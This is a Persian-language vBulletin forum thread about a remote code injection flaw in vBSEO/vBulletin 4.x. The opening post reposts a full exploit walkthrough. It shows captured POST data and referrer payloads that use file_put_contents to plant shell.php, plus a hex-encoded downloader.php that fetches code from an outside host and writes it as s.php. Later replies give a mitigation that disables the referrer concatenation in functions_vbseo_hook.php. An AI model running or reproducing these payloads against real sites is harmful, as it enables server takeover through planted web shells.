تبلیغات در اینترنت

تبلیغات در اینترنتگیفت کارت گوگل پلی
صفحه 1 از 2 12 آخرینآخرین
نمایش نتایج: از 1 به 10 از 12

موضوع: اسیب پذیری خطرناک در vbseo

  1. Top | #1
    کاربر سایت

    تاریخ عضویت
    Jun 2011
    ورژن ویبولتین
    ادزریئش
    نوشته ها
    5
    مورد پسند
    5 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    0

    پیش فرض اسیب پذیری خطرناک در vbseo

    موفق باشید . باییییییییییی


    کد PHP:
    #################################################################################################################[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability[+] Discovered By: Dariush Nasirpour (Net.Edit0r)[+] My Homepage: black-hg.org / nasirpour.info[+] Date: [2015 27 February][+] Vendor Homepage: vBulletin.com[+] Tested on: [vBulletin 4.2.2][+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )#################################################################################################################Remote Code Injection:+++++++++++++++++++++++++1) You Must Register In The vBulletin http://server/register.php example:[blackhat] 2) go to your user profile example: [http://server/members/blackhat.html] 3) post something in visitor message and record post data with live http header [example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= 4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX"  [because vBulletin don't let you send same comment in a time] [Now post this with hackbar:] URL:  http://server/visitormessage.php?do=message [Post data]message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse= [And referrer data:] PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] [Example referrer data:] > upload downloader.php and s.phpPoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents("downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}] 5- Open hackbar and tamper it with taper data:referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}] and submit request. ################################################################################################################ 
    لینک :http://www.exploit-db.com/exploits/36232

    کاربر مقابل از Net.Edit0r بابت این پست مفید تشکر کرده است:





  2. گیفت کارت آیتونز

  3. Top | #2
    کاربر سایت

    تاریخ عضویت
    Jan 2014
    ورژن ویبولتین
    4.2.2
    نوشته ها
    221
    مورد پسند
    52 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    26

    پیش فرض

    ممنون اما راه حل شما ؟

    کاربر مقابل از Ultr4.Froz3n بابت این پست مفید تشکر کرده است:

    5.5 امکان قرار دادن بیش از یک لینک یا بیش از یک عکس در امضا وجود ندارد.

  4. Top | #3
    کاربر سایت

    تاریخ عضویت
    Mar 2014
    ورژن ویبولتین
    4.2.0
    نوشته ها
    179
    مورد پسند
    68 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 35.0
    میزان امتیاز
    21

    پیش فرض

    اگه به فایل visitormessage.php احتیاجی ندارین پاکش کنید
    در غیراینصورت
    در مسیر vbseo/includes فایل functions_vbseo_hook.php را ویرایش کنید و خط زیر رو پیدا کنید
    کد HTML:
    if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER']))
    $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl;

    با کد زیر عوض کنید
    کد HTML:
    // if(isset($_REQUEST['ajax']) && isset($_SERVER['HTTP_REFERER']))
    // $permalinkurl = $_SERVER['HTTP_REFERER'].$permalinkurl;
    ویرایش توسط BestSecurity : 2015/03/03 در ساعت 08:07 PM

    2 تشکر توسط:

    مديريت و كانفيگ سرور لينوكس - امن سازي سرور - تست نفوذپذيري سايت و سرور شما - ارتقاء امنيت سايت و سرور شما - راه اندازي امن وب سايت - ميزباني وب امن

    امنيت اطلاعات اسراروب

    BestSecurity.IR

  5. Top | #4
    کاربر سایت

    تاریخ عضویت
    Jan 2014
    ورژن ویبولتین
    4.2.2
    نوشته ها
    221
    مورد پسند
    52 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    26

    پیش فرض

    visitor message be che kari miyad
    ?

    کاربر مقابل از Ultr4.Froz3n بابت این پست مفید تشکر کرده است:

    5.5 امکان قرار دادن بیش از یک لینک یا بیش از یک عکس در امضا وجود ندارد.

  6. Top | #5
    کاربر سایت

    تاریخ عضویت
    Mar 2014
    ورژن ویبولتین
    4.2.0
    نوشته ها
    179
    مورد پسند
    68 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 35.0
    میزان امتیاز
    21

    پیش فرض

    برای پیغام بازدید کنندگان است..شما لازم نیست پاک کنید همین کاری ک گفتم رو انجام بدین..

    کاربر مقابل از BestSecurity بابت این پست مفید تشکر کرده است:

    مديريت و كانفيگ سرور لينوكس - امن سازي سرور - تست نفوذپذيري سايت و سرور شما - ارتقاء امنيت سايت و سرور شما - راه اندازي امن وب سايت - ميزباني وب امن

    امنيت اطلاعات اسراروب

    BestSecurity.IR

  7. Top | #6
    کاربر سایت

    تاریخ عضویت
    Jan 2014
    ورژن ویبولتین
    4.2.2
    نوشته ها
    221
    مورد پسند
    52 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    26

    پیش فرض

    // faghat ino be poshteshun ezaf konam ?

    کاربر مقابل از Ultr4.Froz3n بابت این پست مفید تشکر کرده است:

    5.5 امکان قرار دادن بیش از یک لینک یا بیش از یک عکس در امضا وجود ندارد.

  8. Top | #7
    کاربر سایت

    تاریخ عضویت
    Mar 2014
    ورژن ویبولتین
    4.2.0
    نوشته ها
    179
    مورد پسند
    68 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 35.0
    میزان امتیاز
    21

    پیش فرض

    کد دومی رو جایگزین اولی کنید.

    کاربر مقابل از BestSecurity بابت این پست مفید تشکر کرده است:

    مديريت و كانفيگ سرور لينوكس - امن سازي سرور - تست نفوذپذيري سايت و سرور شما - ارتقاء امنيت سايت و سرور شما - راه اندازي امن وب سايت - ميزباني وب امن

    امنيت اطلاعات اسراروب

    BestSecurity.IR

  9. Top | #8
    کاربر سایت

    تاریخ عضویت
    Jan 2014
    ورژن ویبولتین
    4.2.2
    نوشته ها
    221
    مورد پسند
    52 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    26

    پیش فرض

    akhe hess kardam
    tanha farghesh
    //
    hast

    کاربر مقابل از Ultr4.Froz3n بابت این پست مفید تشکر کرده است:

    5.5 امکان قرار دادن بیش از یک لینک یا بیش از یک عکس در امضا وجود ندارد.

  10. Top | #9
    کاربر سایت

    تاریخ عضویت
    Mar 2014
    ورژن ویبولتین
    4.2.0
    نوشته ها
    179
    مورد پسند
    68 بار
    اطلاعات
    Windows 7/Server 2008 R2 Firefox 35.0
    میزان امتیاز
    21

    پیش فرض

    شما انجام بدین کاری که گفتم رو.
    مديريت و كانفيگ سرور لينوكس - امن سازي سرور - تست نفوذپذيري سايت و سرور شما - ارتقاء امنيت سايت و سرور شما - راه اندازي امن وب سايت - ميزباني وب امن

    امنيت اطلاعات اسراروب

    BestSecurity.IR

  11. Top | #10
    کاربر سایت

    تاریخ عضویت
    Jan 2014
    ورژن ویبولتین
    4.2.2
    نوشته ها
    221
    مورد پسند
    52 بار
    اطلاعات
    Windows NT 6.3 Chrome 40.0.2214.115
    میزان امتیاز
    26

    پیش فرض

    Chashm

    damet garm

    ye bug ham top x dare
    uno ham mitunin raf konin
    ?
    ویرایش توسط Ultr4.Froz3n : 2015/03/03 در ساعت 08:23 PM دلیل: ادغام دو پست
    5.5 امکان قرار دادن بیش از یک لینک یا بیش از یک عکس در امضا وجود ندارد.

صفحه 1 از 2 12 آخرینآخرین

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

در حال حاضر 1 کاربر در حال مشاهده این موضوع است. (0 کاربران و 1 مهمان ها)

موضوعات مشابه

  1. پاسخ: 3
    آخرين نوشته: 2014/12/02, 04:13 PM
  2. پاسخ: 1
    آخرين نوشته: 2013/10/26, 04:48 PM
  3. درخواست Downloads II vBSEO Extension از vBseo.com
    توسط OmidX در انجمن درخواست هک و پلاگین
    پاسخ: 14
    آخرين نوشته: 2012/06/10, 03:26 PM
  4. [هشدار جدی] وجود باگ در vBSEO و vBSEO Sitemap
    توسط VBIran در انجمن قوانین و اطلاعيه ها و اخبار انجمن ها
    پاسخ: 13
    آخرين نوشته: 2011/06/21, 10:30 PM
  5. وجود باگ در VBSeo 3.6.0 RC2 و vBSEO XML Sitemap 3.0 PL1 به پائین
    توسط VBIran در انجمن قوانین و اطلاعيه ها و اخبار انجمن ها
    پاسخ: 16
    آخرين نوشته: 2011/04/13, 01:15 PM

علاقه مندی ها (Bookmarks)

علاقه مندی ها (Bookmarks)

مجوز های ارسال و ویرایش

  • شما نمیتوانید موضوع جدیدی ارسال کنید
  • شما امکان ارسال پاسخ را ندارید
  • شما نمیتوانید فایل پیوست کنید.
  • شما نمیتوانید پست های خود را ویرایش کنید
  •